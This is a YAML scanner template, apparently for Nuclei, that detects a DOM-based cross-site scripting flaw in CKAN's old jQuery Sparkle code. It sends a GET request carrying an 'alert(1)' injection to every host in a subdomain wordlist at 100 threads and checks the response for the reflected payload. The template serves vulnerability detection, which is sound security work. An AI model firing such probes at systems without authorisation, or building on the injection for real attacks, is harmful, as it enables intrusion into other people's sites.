id: ckan-dom-based-xss
info:
  name: CKAN DOM Based XSS
  author: dhiyaneshDk
  severity: medium
  description: CKAN uses the old jQuery Sparkle library which is vulnerable to DOM Based XSS.
  tags: dom,xss
  reference: https://github.com/ckan/ckan/blob/b9e45e2723d4abd70fa72b16ec4a0bebc795c56b/ckan/public/base/javascript/view-filters.js#L27
requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100
    raw:
      - |
        GET /?{alert(1)} HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - '<option value="/en/?{alert(1)}" selected="selected">'
      - type: word
        words:
          - 'text/html'
        part: header
